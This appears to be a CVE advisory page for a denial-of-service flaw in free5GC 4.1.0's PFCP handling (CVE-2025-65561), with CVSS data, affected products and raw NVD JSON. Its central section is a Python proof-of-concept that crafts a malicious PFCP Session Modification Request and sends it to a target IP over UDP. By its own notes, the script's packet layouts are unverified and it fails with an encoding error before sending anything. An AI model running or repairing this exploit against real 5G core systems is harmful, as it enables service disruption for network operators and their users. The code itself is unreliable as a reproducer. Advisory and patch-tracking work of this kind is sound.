Security Vulnerability Report
CVE-2025-65561 CVSS 7.5 HIGH

CVE-2025-65561

Published: 2025-12-18 19:16:34
Last Modified: 2026-01-07 21:00:59

Description

An issue was discovered in function LocalNode.Sess in free5GC 4.1.0 allowing attackers to cause a denial of service or other unspecified impacts via crafted header Local SEID to the PFCP Session Modification Request.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:free5gc:free5gc:4.1.0:*:*:*:*:*:*:* - VULNERABLE
free5GC < 4.1.0 (possibly affected; the CPE entry above lists only 4.1.0)
free5GC = 4.1.0 (confirmed affected)
go-upf (related component, possibly affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-65561 PoC - free5GC LocalNode.Sess DoS

Builds a PFCP Session Modification Request carrying a crafted Local SEID and
sends it once over UDP to a free5GC 4.1.0 target.

Review notes:
- The byte layouts below are this listing's own and have not been checked
  against the PFCP specification; do not treat the script as a validated
  reproducer.
- As written, create_pfcp_session_modification_request() raises struct.error
  while encoding the Node ID element, so exploit() stops before a socket is
  opened. A run of this script therefore says nothing about whether a
  deployment is patched.
- The advisory classifies the flaw as CWE-20 and links free5gc issue #730 and
  go-upf pull request #80; patch status should be confirmed there.
- The CVSS vector rates the issue as network-reachable with no privileges
  required, so the PFCP listener (UDP, default port 8805 below) should only be
  reachable from the peers that are meant to talk to it.
"""

import socket
import struct
import random


def create_pfcp_header(msg_type, flags=0x20):
    """Return the 4-byte header used by this listing.

    Layout as packed here: one byte ``(1 << 5) | flags``, one byte
    ``msg_type``, then a 16-bit big-endian length that is always zero.
    """
    first_octet = flags | (1 << 5)
    placeholder_length = 0  # this function never fills the length in
    return struct.pack('!BBH', first_octet, msg_type, placeholder_length)


def create_ie(ie_type, ie_data):
    """Prefix ``ie_data`` with this listing's 4-byte element header.

    The header is one byte ``(ie_type << 4) | 0x01``, a zero byte, and the
    payload length as a 16-bit big-endian integer.

    Raises:
        struct.error: if the first byte falls outside 0..255 (any ``ie_type``
            above 15) or the payload is longer than 65535 bytes.
    """
    tag_octet = (ie_type << 4) | 0x01
    return struct.pack('!BBH', tag_octet, 0, len(ie_data)) + ie_data


def create_malicious_local_seid():
    """Return a random 64-bit big-endian value whose upper 32 bits are all set."""
    lowest, highest = 0xFFFFFFFF00000000, 0xFFFFFFFFFFFFFFFE
    return struct.pack('!Q', random.randint(lowest, highest))


def create_pfcp_session_modification_request():
    """Concatenate the header, a Node ID element and a Local SEID element.

    The header is built with message type 51, the Node ID element with type 77
    and payload 00 00 00 01, and the Local SEID element with type 0x59. After
    joining, ``len(message) - 4`` is written as a 16-bit big-endian value over
    bytes 4-5 of the buffer.

    Raises:
        struct.error: from create_ie(); type 77 is above the range that
            function can encode, so this call fails as the listing stands.
    """
    pieces = [create_pfcp_header(51)]
    pieces.append(create_ie(77, b'\x00\x00\x00\x01'))
    pieces.append(create_ie(0x59, create_malicious_local_seid()))
    raw = b''.join(pieces)

    length_field = struct.pack('!H', len(raw) - 4)
    return raw[:4] + length_field + raw[6:]


def exploit(target_ip, target_port=8805):
    """Build the request and send it as a single UDP datagram.

    The payload is built outside the ``try`` block, so an encoding failure
    propagates to the caller; only socket errors are caught and printed.
    """
    print(f"[*] Target: {target_ip}:{target_port}")
    print("[*] Creating malicious PFCP Session Modification Request...")

    payload = create_pfcp_session_modification_request()
    print(f"[*] Payload length: {len(payload)} bytes")
    print(f"[*] Payload (hex): {payload.hex()}")

    destination = (target_ip, target_port)
    try:
        print("[*] Sending malicious packet...")
        udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        udp.settimeout(5)
        udp.sendto(payload, destination)
        print("[+] Packet sent successfully")
        udp.close()
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    import sys

    if len(sys.argv) >= 2:
        exploit(sys.argv[1])
    else:
        print(f"Usage: {sys.argv[0]} <target_ip>")
        sys.exit(1)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65561", "sourceIdentifier": "[email protected]", "published": "2025-12-18T19:16:33.633", "lastModified": "2026-01-07T21:00:58.650", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in function LocalNode.Sess in free5GC 4.1.0 allowing attackers to cause a denial of service or other unspecified impacts via crafted header Local SEID to the PFCP Session Modification Request."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:free5gc:free5gc:4.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "4087E419-65F0-4AAD-A2F6-C24EEDC27B3B"}]}]}], "references": [{"url": "https://github.com/free5gc/free5gc/issues/730", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://github.com/free5gc/go-upf/pull/80", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/free5gc/free5gc/issues/730", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}